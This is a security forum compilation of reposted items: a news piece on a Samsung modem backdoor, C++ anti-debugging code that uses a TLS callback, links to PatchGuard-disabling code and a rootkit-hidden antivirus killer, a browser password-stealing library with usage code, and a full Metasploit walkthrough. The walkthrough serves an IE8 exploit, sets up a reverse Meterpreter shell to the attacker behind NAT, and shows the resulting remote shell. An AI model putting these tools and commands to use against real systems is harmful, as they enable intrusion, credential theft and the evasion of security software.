A zero-day has been discovered that allows attackers to remotely exploit a software-based backdoor contained in at least nine types of Samsung smartphones and tablets. The exploit allows an attacker to steal documents and location information, or to activate the microphone and camera. The news came to light Wednesday from members of the Replicant project, which develops free variants of Android to replace the stock versions pre-installed by most carriers and suppliers. Replicant developers stated they discovered that the radio modems on several Samsung devices will carry out remote file system (RFS) commands.

“We discovered that the proprietary program running on the applications processor in charge of handling the communication protocol with the modem actually implements a back door that lets the modem perform remote file I/O operations on the file system,” said Replicant developer Paul Kocialkowski in an article posted on the Free Software Foundation’s website. “This program is shipped with the Samsung Galaxy devices and makes it possible for the modem to read, write, and delete files on the phone’s storage. On several phone models, this program runs with sufficient rights to access and modify the user’s personal data,” he added.

Samsung didn’t immediately reply to an emailed request for comment about Replicant’s findings, or to questions about which models may be affected and whether or not they plan to patch vulnerable devices. Replicant’s research identified nine kinds of Samsung devices that contain the vulnerability: the Nexus S, Galaxy S, Galaxy S 2, Galaxy Note, Galaxy Nexus, Galaxy Tab 2 7.0, Galaxy Tab 2 10.1, Galaxy S 3, and Galaxy Note 2. Whether other devices are affected is unknown at this time; they speculate there could be many more.

Sursa: Backdoor exploit discovered in Samsung Galaxy
-
[h=1]Detect debugger with TLS callback[/h][h=3]zwclose7[/h]

A TLS callback is a function that is called before the process entry point executes. If you run the executable under a debugger, the TLS callback will be executed before the debugger breaks. This means you can perform anti-debugging checks before the debugger can do anything. Therefore, the TLS callback is a very powerful anti-debugging technique.

To add a TLS callback to your program, you need to create a section called .CRT$XLB in the executable image, and then put the TLS callback function address into this section. You also need to add the __tls_used symbol to the executable image.

The following stack trace shows how the TLS callback is called (from Process Hacker):

0, ntoskrnl.exe!KiDeliverApc+0x1c7
1, ntoskrnl.exe!KiCommitThreadWait+0x3dd
2, ntoskrnl.exe!KeWaitForSingleObject+0x19f
3, win32k.sys!xxxRealSleepThread+0x257
4, win32k.sys!xxxSleepThread+0x59
5, win32k.sys!NtUserWaitMessage+0x46
6, ntoskrnl.exe!KiSystemServiceCopyEnd+0x13
7, wow64cpu.dll!CpupSyscallStub+0x9
8, wow64cpu.dll!Thunk0Arg+0x5
9, wow64.dll!RunCpuSimulation+0xa
10, wow64.dll!Wow64LdrpInitialize+0x42a
11, ntdll.dll!LdrpInitializeProcess+0x17e3
12, ntdll.dll! ?? ::FNODOBFM::`string'+0x28ff0
13, ntdll.dll!LdrInitializeThunk+0xe
14, user32.dll!NtUserWaitMessage+0x15
15, user32.dll!DialogBox2+0x222
16, user32.dll!InternalDialogBox+0xe5
17, user32.dll!SoftModalMessageBox+0x757
18, user32.dll!MessageBoxWorker+0x269
19, user32.dll!MessageBoxTimeoutW+0x52
20, user32.dll!MessageBoxTimeoutA+0x76
21, user32.dll!MessageBoxExA+0x1b
22, user32.dll!MessageBoxA+0x18
23, tls.exe!TlsCallback+0x3c
24, ntdll.dll!LdrpCallInitRoutine+0x14
25, ntdll.dll!LdrpCallTlsInitializers+0x9e
26, ntdll.dll!LdrpRunInitializeRoutines+0x3ab
27, ntdll.dll!LdrpInitializeProcess+0x1400
28, ntdll.dll!_LdrpInitialize+0x78
29, ntdll.dll!LdrInitializeThunk+0x10

You can see the TLS callback is called by the loader during process startup. Here is example code.
#include <stdio.h>
#include <Windows.h>

#pragma comment(lib,"ntdll.lib")
#pragma comment(linker,"/include:__tls_used") // This will cause the linker to create the TLS directory
#pragma section(".CRT$XLB",read) // Create a new section

extern "C" NTSTATUS NTAPI NtQueryInformationProcess(HANDLE hProcess,ULONG InfoClass,PVOID Buffer,ULONG Length,PULONG ReturnLength);

#define NtCurrentProcess() (HANDLE)-1

// The TLS callback is called before the process entry point executes, and is executed before the debugger breaks
// This allows you to perform anti-debugging checks before the debugger can do anything
// Therefore, TLS callback is a very powerful anti-debugging technique
void WINAPI TlsCallback(PVOID Module,DWORD Reason,PVOID Context)
{
	PBOOLEAN BeingDebugged=(PBOOLEAN)__readfsdword(0x30)+2; // Read the BeingDebugged flag from the PEB
	HANDLE DebugPort=NULL;
	if(*BeingDebugged)
	{
		MessageBox(NULL,"Debugger detected!","TLS callback",MB_ICONSTOP);
	}
	else
	{
		MessageBox(NULL,"No debugger detected","TLS callback",MB_ICONINFORMATION);
	}
	// Another check
	if(!NtQueryInformationProcess(
		NtCurrentProcess(),
		7,              // ProcessDebugPort
		&DebugPort,     // If a debugger is present, this is set to -1 | Otherwise, it is set to NULL
		sizeof(HANDLE),
		NULL))
	{
		if(DebugPort)
		{
			MessageBox(NULL,"Debugger detected!","TLS callback",MB_ICONSTOP);
		}
		else
		{
			MessageBox(NULL,"No debugger detected","TLS callback",MB_ICONINFORMATION);
		}
	}
}

__declspec(allocate(".CRT$XLB")) PIMAGE_TLS_CALLBACK CallbackAddress[]={TlsCallback,NULL}; // Put the TLS callback address into a null terminated array in the .CRT$XLB section

// The entry point is executed after the TLS callback
int main()
{
	printf("Hello world");
	getchar();
	return 0;
}

[h=4]Attached Files[/h] tls.zip 350.48KB 15 downloads

Sursa: Detect debugger with TLS callback - Source Codes - rohitab.com - Forums
-
[h=1]PatchGuard disabling code for up-to-date Win8.1[/h]
Source download: https://github.com/tandasat/findpg
Developed by: https://twitter.com/standa_t
Via: DEMO PatchGuard disabling code for up-to-date Win8.1 - Source Codes - rohitab.com - Forums
-
[h=1]Antivirus killer with AFX Rootkit[/h] This is my new antivirus killer, AFX KillAV. This program blocks the execution of antivirus software. AFX Windows Rootkit 2003 is used to hide the process of this program.

Features:
Runs on Windows startup.
Blocks execution of antivirus software.
Hides its own running process using AFX Windows Rootkit 2003.

AFX Windows Rootkit 2003 is a user-mode rootkit that allows you to hide processes, files and registry entries.

[h=4]Attached Files[/h] winav.zip 404.1KB 1158 downloads

Sursa: Antivirus killer with AFX Rootkit - Source Codes - rohitab.com - Forums
-
[h=1]Password recovery for firefox, IE, google talk and more[/h]By [h=3]shebaw[/h]

Hi everyone, since there is a growing number of topics about password recovery, I decided to share the code I wrote after disassembling popular recovery software. I was hoping I would clean it up a little bit (too many callbacks, memory mapping). It recovers passwords stored by: IE 4-9, Firefox 0 to the latest version, GTalk, MSN Messenger, Windows Live Messenger, Generic Network & Visible domain passwords. I'm sorry for cramming most of the recovery code into pass_recov.c; I was hoping I would break that up. I've attached the project. Here is sample code showing how to use it:

#include <stdio.h>
#include "pass_recov.h"

void CALLBACK display_pass(pass_type_t ptype, const wchar_t *url, const wchar_t *username, const wchar_t *password, void *param)
{
	switch (ptype)
	{
	case firefox3:
	case firefox4:
		wprintf(L"firefox pass username:%s password:%s", username, password);
		break;
	/* and so on, you get the idea */
	}
}

int main(void)
{
	struct cred_grab_arg carg;

	carg.grab_pass = display_pass; /* user defined callback that's called for each password recovered */
	carg.param = NULL; /* user defined parameter that's used to pass values to the callback, NULL in this case */
	get_firefox_passwords(&carg);
	get_ie_passwords(&carg);
	return 0;
}

The previous versions of Firefox (0-3) used signon[1-3].txt, while the later versions use an sqlite database. The functions used to manipulate the sqlite databases are loaded from Firefox's installation directory, so sqlite doesn't need to be linked statically. It works from Firefox 0 to the latest version. I didn't test the IE recovery code on IE 10, but it should work. IE 7 and above hash the passwords stored for each site using the URL of the website, which I think is clever. It can be circumvented if IE is set to store the history of browsed sites (the default behavior), since we can get the URLs and see if the hashes match.
I'm not sure how IE 'sanitizes' the URLs, since it differs from site to site, so I've added the two ways I noticed.

[h=4]Attached Files[/h] pass_recov.zip 16.58KB 842 downloads

Sursa: Password recovery for firefox, IE, google talk and more - Source Codes - rohitab.com - Forums
-
Metasploit Meterpreter and NAT Published January 4, 2014 | By Corelan Team (corelanc0d3r)

Professional pentesters typically perform their audits from a host that is connected directly to the internet, has a public IP address, and is not hindered by any firewalls or NAT devices. Hacking "naked" is considered to be the easiest way to perform a penetration test that involves getting shells back. Not everyone has the luxury of putting a box directly on the internet, and as the number of free public IP addresses continues to decrease, the need for using an audit box placed in a LAN, behind a router or firewall, will increase.

Putting an audit box behind a device that translates traffic from private to public and vice versa has some consequences. Not only will you need to be sure that the NAT device won’t "break" if you start a rather fast portscan, but since the host is in a private LAN, behind a router or firewall, it won’t be reachable directly from the internet. Serving exploits and handling reverse, incoming, shells can be problematic in this scenario. In this small post, we’ll look at how to correctly configure Meterpreter payloads and make them work when your audit box is behind a NAT device. We’ll use a browser exploit to demonstrate how to get a working Meterpreter session, even if both the target and the Metasploit "attacker" box are behind NAT.

Network setup

I’ll be using the following network setup in this post: both the attacker and the target are behind a NAT device. We don’t know the IP range used by the target, and we’ve determined there is no direct way in from the internet to the target network, so the public IP of the target is not relevant. We’ll assume that the target has the ability to connect to the internet over ports 80 and 443. I’ve used IP 1.1.1.1 to indicate the "public" side of our attack network. You will have to replace this IP with your own public IP when trying the steps in this post.
I will use Kali Linux as the attacker, and I have set up a clone of the Metasploit Git repository on the box:

cd /
mkdir -p /pentest/exploits
cd /pentest/exploits
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install

If you already had a git clone set up, make sure to update to the latest and greatest with "git pull". (A small bug related to using Meterpreter behind NAT was just fixed a few hours ago, so it’s important to update to the latest version.)

The target is just a Windows XP SP3 box, but it doesn’t really matter what it is, as long as we can use a browser exploit to demonstrate how to use Meterpreter. I have installed Internet Explorer 8 from IE Collection (download here: Utilu IE Collection - Utilu.com). I’ll be using this IE version because it’s outdated and pretty much vulnerable to most of the IE8 browser exploits out there.

Set up forwarding on the attacker side

If we ever want to be able to accept connections from the target, we will need to configure the attacker firewall/NAT to forward traffic on certain ports. The exact steps to do this will be very specific to the brand/model/type of router/firewall that you are using, so this is beyond the scope of this post. In general, the idea is to configure the router/firewall so traffic to the public IP address of the router, on ports 80 and 443, will be forwarded to 192.168.0.187 (which is the LAN IP of my attacker box). When setting up the router/firewall, make sure to check that ports 80 and/or 443 are not used by the router/firewall itself (management interface, VPN endpoint, etc). We’ll use port 80 to serve the browser exploit and port 443 for the reverse Meterpreter connection. First, we need to verify that the forwarding works.
On Kali, create a small html file and store it under /tmp:

root@krypto1:/# cd /tmp
root@krypto1:/tmp# echo "It works" > test.html

Next, make sure nothing is currently using port 80 or port 443:

root@krypto1:/tmp# netstat -vantu | grep :80
root@krypto1:/tmp# netstat -vantu | grep :443

If you don’t see output from either command, you should be good to go. If something is listed, you’ll need to find what process is using the port and kill the process. For port 80, you could check the processes that are taking control over the http port using the following lsof command:

root@krypto1:/tmp# lsof -i | grep :http
apache2 4634 root 4u IPv6 393366 0t0 TCP *:http (LISTEN)
apache2 4642 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)
apache2 4643 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)
apache2 4644 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)
apache2 4645 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)
apache2 4646 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)

Just stop apache2 to free up the port:

root@krypto1:/tmp# service apache2 stop
Stopping web server: apache2 ... waiting .
root@krypto1:/tmp#

With all ports available, we’ll run a simple web server and serve the "test.html" page. From the folder that contains the test.html file, run this python command:

root@krypto1:/tmp# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

If you now connect to http://192.168.0.187/test.html from the Kali box itself, you should see the "It works" page. The output on the Kali box should list the connection and show that the page was served with response 200:

root@krypto1:/tmp# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.0.187 - - [04/Jan/2014 12:42:02] "GET /test.html HTTP/1.1" 200 -

Perfect, this proves that the webserver works. On the target computer, connect to http://1.1.1.1/test.html (again, replace 1.1.1.1 with the public IP of the router/firewall on the attacker side) and you should get the same thing.
If you don’t see the page, check that the forwarding is set up correctly. If this works for port 80, go back to the attacker box and terminate the python command using CTRL+C. Then launch the command again, this time using port 443:

root@krypto1:/tmp# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...

Now access the webserver over port 443. Despite the fact that we are using 443 and that 443 is commonly associated with https (encrypted), our python handler is not using encryption. In other words, we still have to use http instead of https in the URL:

root@krypto1:/tmp# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...
192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /test.html HTTP/1.1" 200 -
192.168.0.187 - - [04/Jan/2014 12:47:44] code 404, message File not found
192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /favicon.ico HTTP/1.1" 404 -
192.168.0.187 - - [04/Jan/2014 12:47:44] code 404, message File not found
192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /favicon.ico HTTP/1.1" 404 -

(Don’t worry about the 404 messages related to /favicon.ico – it’s safe to ignore them.)

If you can connect to http://1.1.1.1:443/test.html from the target computer, we know that the port forwarding is working correctly for both ports 80 and 443. If this doesn’t work, there’s no point in proceeding, because anything else we try will fail. When everything works, close the python command to free up port 443 too.

Metasploit configuration

Browser exploit – meterpreter/reverse_https

First of all, let’s set up Metasploit to serve the browser exploit and handle a reverse https Meterpreter connection. The idea is to trick the target into connecting to the exploit on port 80 and serve the meterpreter/reverse_https connection over port 443. Go to the metasploit-framework folder, open msfconsole (don’t forget the ./ if you want to be sure you’re running msfconsole from the current folder and not the version that was installed with Kali) and select an exploit.
For the sake of this exercise, I’ll use ms13_069_caret.rb:

root@krypto1:/tmp# cd /pentest/exploits/metasploit-framework/
root@krypto1:/pentest/exploits/metasploit-framework# ./msfconsole

(msfconsole ASCII art banner trimmed)

       =[ metasploit v4.9.0-dev [core:4.9 api:1.0]
+ -- --=[ 1248 exploits - 678 auxiliary - 199 post
+ -- --=[ 324 payloads - 32 encoders - 8 nops

msf > use exploit/windows/browser/ms13_069_caret
msf exploit(ms13_069_caret) >

Show the options:

msf exploit(ms13_069_caret) > show options

Module options (exploit/windows/browser/ms13_069_caret):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   IE 8 on Windows XP SP3

The exploit requires a SRVHOST and SRVPORT. These two variables will be used by Metasploit to determine where the webserver needs to bind to and listen on. The plan is to trick the target into connecting to this webserver, using the public IP of our firewall/router, which will then forward the traffic to our Metasploit instance. We can't tell the Metasploit webserver to listen on the public IP of our router, because it won't be able to "bind" itself to that IP address. If we use 0.0.0.0, the Metasploit webserver will simply listen on all interfaces for incoming traffic. In other words, you can leave SRVHOST at 0.0.0.0, or you can set it to the LAN IP of the Kali box itself (192.168.0.187 in this case). I'll just leave the default 0.0.0.0.
Next, we need to change the port to 80, and we'll set the URIPATH to / (so we can predict what the URI will be, instead of letting Metasploit create a random URI):

msf exploit(ms13_069_caret) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms13_069_caret) > set URIPATH /
URIPATH => /

Next, let's select the meterpreter reverse_https payload for windows. If we run "show options" again, we'll see this:

msf exploit(ms13_069_caret) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ms13_069_caret) > show options

Module options (exploit/windows/browser/ms13_069_caret):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The local listener hostname
   LPORT     443              yes       The local listener port

Exploit target:

   Id  Name
   --  ----
   0   IE 8 on Windows XP SP3

msf exploit(ms13_069_caret) >

The Module options (SRVHOST and SRVPORT) are set the way we want them. The Payload options require an LHOST and LPORT. Based on the output above, LPORT is already set to 443. This is the port where the Meterpreter reverse connection will attempt to connect to.
If it was not set to 443 already on your box, simply run "set LPORT 443" to make sure the Meterpreter handler will listen on port 443:

msf exploit(ms13_069_caret) > set LPORT 443
LPORT => 443

Note: In any case, to keep things as easy as possible, try to use the same ports for a specific "service". That is, if you host the webserver on port 80 on the firewall, try to make sure to also forward traffic to port 80 on the attacker/Metasploit box, and host the exploit on port 80 in Metasploit. The same thing applies to the payload. If we serve the payload on port 443, make sure to use this port everywhere.

LHOST serves 2 purposes:

- It indicates the IP address where the Meterpreter shellcode will have to connect back to (from the target, to the attacker).
- It tells Metasploit where to bind to when setting up the Meterpreter "handler".

Since our attacker host is behind NAT, we have to use the public IP address of the router/firewall as LHOST. When the exploit is executed, this IP will be embedded in the shellcode, and when the initial Meterpreter shellcode runs on the target, it will connect back to this IP address. The port forwarding on our router/firewall will then forward traffic to the LAN IP of the attacker host. For this reason, we need to set LHOST to 1.1.1.1 (the public IP of your attacker router/firewall).

Using a public IP as LHOST also means that Metasploit will attempt to bind itself to that IP when setting up the Meterpreter handler. Since this IP belongs to the router/firewall and not to the Metasploit instance, this will obviously fail. The good thing is that Metasploit will automatically fall back to 0.0.0.0 and basically serve the Meterpreter handler on all local IPs on the attacker host, while remembering that LHOST was set to our public IP address. This is exactly what we need.
Set LHOST to 1.1.1.1:

msf exploit(ms13_069_caret) > set LHOST 1.1.1.1
LHOST => 1.1.1.1

If we don't really want the Meterpreter handler to fall back to 0.0.0.0, we can use one of the "advanced" options and tell it to listen on the LAN IP address:

msf exploit(ms13_069_caret) > set ReverseListenerBindAddress 192.168.0.187
ReverseListenerBindAddress => 192.168.0.187

and then fire up the exploit:

msf exploit(ms13_069_caret) > exploit
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.0.187:443/
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.0.187:80/
[*] Server started.

The output shows us that http://0.0.0.0:80 (or http://192.168.0.187:80) is hosting the browser exploit. If the target connects to http://1.1.1.1, traffic will be forwarded to the Kali box on port 80, which will serve the exploit. The HTTPS reverse handler is listening on 192.168.0.187, port 443. What we don’t see in the output is the fact that the actual Meterpreter shellcode contains IP address 1.1.1.1 to connect back to. That value is taken from the LHOST variable.

If you didn’t use ReverseListenerBindAddress and you get something like the output below after running "exploit", then check the following:

- check that the port is free to use
- make sure you are running the latest version of Metasploit
- set the ReverseListenerBindAddress to your local LAN IP or to 0.0.0.0
- exit msfconsole and open it again; under certain scenarios, you’ll notice that the bind doesn’t get properly cleaned up if you ran a session before

msf exploit(ms13_069_caret) > exploit
[*] Exploit running as background job.
[-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:443).

If we now use IE8 (from IE Collection) on the target and connect to the public IP of our attacker router/firewall on port 80, we should see this:

msf exploit(ms13_069_caret) >
[*] 2.2.2.2 ms13_069_caret - Sending exploit...
[*] 2.2.2.2 ms13_069_caret - Sending exploit...
[*] 2.2.2.2:53893 Request received for /NtFT...
[*] 2.2.2.2:53893 Staging connection for target /NtFT received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 1 opened (192.168.0.187:443 -> 2.2.2.2:53893) at 2014-01-05 09:24:26 +0100
[*] Session ID 1 (192.168.0.187:443 -> 2.2.2.2:53893) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2952)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 500
[+] Successfully migrated to process

msf exploit(ms13_069_caret) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 592 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\peter\Desktop>

2.2.2.2 is the public IP of the target. Metasploit sends the payload when the target connects to port 80, exploits the browser and executes the initial Meterpreter payload. This payload will download metsrv.dll (which gets patched by Metasploit first, so it contains the attacker's public IP and port), load it into memory (using reflective loading) and run the code. When that is done, you get a full Meterpreter session. Life is good.

So, in a nutshell, set the following variables and you should be good to go:

SRVHOST: 0.0.0.0
SRVPORT: set to the port where you want to host the browser exploit
LHOST: the attacker public IP
LPORT: set to the port where you want to serve the Meterpreter handler
ReverseListenerBindAddress: LAN IP (optional)

If, for whatever reason, you also want to host the Meterpreter handler on another port than the one the client will connect to, you can use LPORT to specify where the target will connect back to, and use ReverseListenerBindPort to indicate where the handler needs to listen.
Obviously, you’ll need to make sure the port forwarding will connect to the right port on your attacker machine. © 2014, Corelan Team (corelanc0d3r). All rights reserved. Sursa: https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/
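The pre-flight checks from this post — "is the port free?" and "does the HTTP path serve the test page?" — can also be scripted. The helper below is a hypothetical sketch, not part of Metasploit: it mirrors the netstat and SimpleHTTPServer steps locally, while checking through the router's public IP of course still has to be done from outside the LAN.

```python
import http.server
import os
import socket
import tempfile
import threading
import urllib.request

def port_is_free(port, host="0.0.0.0"):
    """Mirror the netstat check: try to bind the port ourselves."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            s.bind((host, port))
            return True
        except OSError:
            return False

def serve_and_fetch(docroot, filename="test.html", port=0):
    """Serve docroot on localhost and fetch filename back, like the
    'It works' test. port=0 picks a free ephemeral port."""
    handler = lambda *a, **kw: http.server.SimpleHTTPRequestHandler(
        *a, directory=docroot, **kw)
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        url = f"http://127.0.0.1:{srv.server_address[1]}/{filename}"
        return urllib.request.urlopen(url).read().decode().strip()
    finally:
        srv.shutdown()
        srv.server_close()

docroot = tempfile.mkdtemp()
with open(os.path.join(docroot, "test.html"), "w") as f:
    f.write("It works\n")
print(serve_and_fetch(docroot))  # → It works
```

Running `port_is_free(80)` and `port_is_free(443)` before starting the handlers catches the Rex::AddressInUse situation shown earlier without having to parse netstat output.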
-
-
-